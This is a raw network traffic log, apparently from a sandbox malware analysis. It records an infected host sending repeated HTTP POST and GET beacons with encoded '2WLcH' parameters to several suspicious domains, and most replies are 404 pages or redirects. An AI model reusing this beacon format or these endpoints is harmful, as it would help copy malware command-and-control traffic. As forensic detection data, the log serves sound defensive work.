                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                44 | 192.168.11.20 | 49785 | 45.81.23.25 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:16.649075031 CET | 2578 | OUT | POST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:16.821852922 CET | 413 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:16 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                45 | 192.168.11.20 | 49786 | 45.81.23.25 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:19.344767094 CET | 453 | OUT | GET /ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:19.517625093 CET | 413 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:19 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                46 | 192.168.11.20 | 49787 | 13.248.169.48 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:32.897140980 CET | 724 | OUT | POST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                47 | 192.168.11.20 | 49788 | 13.248.169.48 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:35.524068117 CET | 744 | OUT | POST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                48 | 192.168.11.20 | 49789 | 13.248.169.48 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:38.164416075 CET | 7893 | OUT | POST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                49 | 192.168.11.20 | 49790 | 13.248.169.48 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:40.802793980 CET | 456 | OUT | GET /h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:40.907938004 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 11:00:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM"}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                50 | 192.168.11.20 | 49791 | 195.110.124.133 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:57.340029955 CET | 463 | OUT | GET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.officinadelpasso.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:57.538007975 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:57 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                51 | 192.168.11.20 | 49792 | 172.67.145.234 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:02.650437117 CET | 709 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:03.194276094 CET | 879 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:03 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp%2FrSJCndQU5i6jaNo8R7BcjAEG7dYVXxX1OShSnjeGcAhuk0zEEhaIYcpapxUEIK7kSm%2BpiEyMs5UqiNxRjclIFrAT%2FOYmT2A1twJjJEB5JYBHoPNBOXg%2BzMJBWeFnk"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e812373da88de92-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97292&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 12:01:03.194318056 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                52 | 192.168.11.20 | 49793 | 172.67.145.234 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:05.274791956 CET | 729 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:05.526657104 CET | 784 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:05 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6UgWDk98jllv1zS3o2TUEZoLkkiCtOCf85ghPYsVB11h%2BrUbdprfRfwyW7ogqJA0xRAb7rSqBD%2F7pjkkNyWOuitnJXSPILoiSrm1%2BY5nalIQkDXt702NCM5XIA8P%2Bqt"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8123844c1742d4-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97389&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.11.20 | 49794 | 172.67.145.234 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:07.899456024 CET | 2578 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 12:01:08.453958035 CET | 791 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:08 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2B6hUJV6d1K21VcZq0%2F%2F%2B3vwjTJkXWpmTCf3SZGwxBepnECy9DVgtCWiRf6zN8AjepP8R21nK6WKz0jQX1lU4xIg0%2F2q5RG2laKaje9lXbSdZFa6DXDTMj%2FVTD89V4o%2F"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e812394a8e443b0-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97738&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.11.20 | 49795 | 172.67.145.234 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:10.522569895 CET | 451 | OUT | GET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 12:01:10.756262064 CET | 890 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:10 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUxpLconqKnckTGgqxyCYbND%2FteMLsBeqyCP7sBG%2BII5T8KHTvQFIe9A2kc2p823eVw7fMGKTiSFEtOrdt4h1KlnoLj7S%2B2dKzywapoH6Uukmsd8XVcOyZkhgCjkq5yY"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8123a51dbc424f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97287&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 25, 2024 12:01:10.756303072 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.11.20 | 49796 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:15.874686003 CET | 706 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.11.20 | 49797 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:18.514669895 CET | 726 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.11.20 | 49798 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:21.153971910 CET | 2578 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49799 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:23.792421103 CET | 450 | OUT | GET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 12:01:23.896320105 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 11:01:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49802 | 31.31.196.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 12:01:29.123054981 CET | 730 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 12:01:29.365194082 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:29 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 12:01:29.366092920 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 12:01:29.366164923 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 12:01:29.578191042 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                60 | 192.168.11.20 | 49803 | 31.31.196.177 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:31.878174067 CET | 750 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/36OPxrN5gPU7pgC/ZqqAJ8HMBJqH+g6etL2igA4fSxDSS5fvxQL97dVMdyHPfzdJ/3Giro/jwL3Mgd7Exdox5lVFTZvhyYl7O2Io48QZNIUh4gbcrLB4HooPB4k7eyEoweku1zyox1AXCgBDMYQ9YoM+CPGPaKN7nXNQTYlwRdVRCg=
                                                                                Nov 25, 2024 12:01:32.128256083 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:32 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                61 | 192.168.11.20 | 49804 | 31.31.196.177 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:34.622042894 CET | 2578 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:34.872262955 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:34 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                62 | 192.168.11.20 | 49805 | 31.31.196.177 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:37.366810083 CET | 458 | OUT | GET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:37.597584963 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:37 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
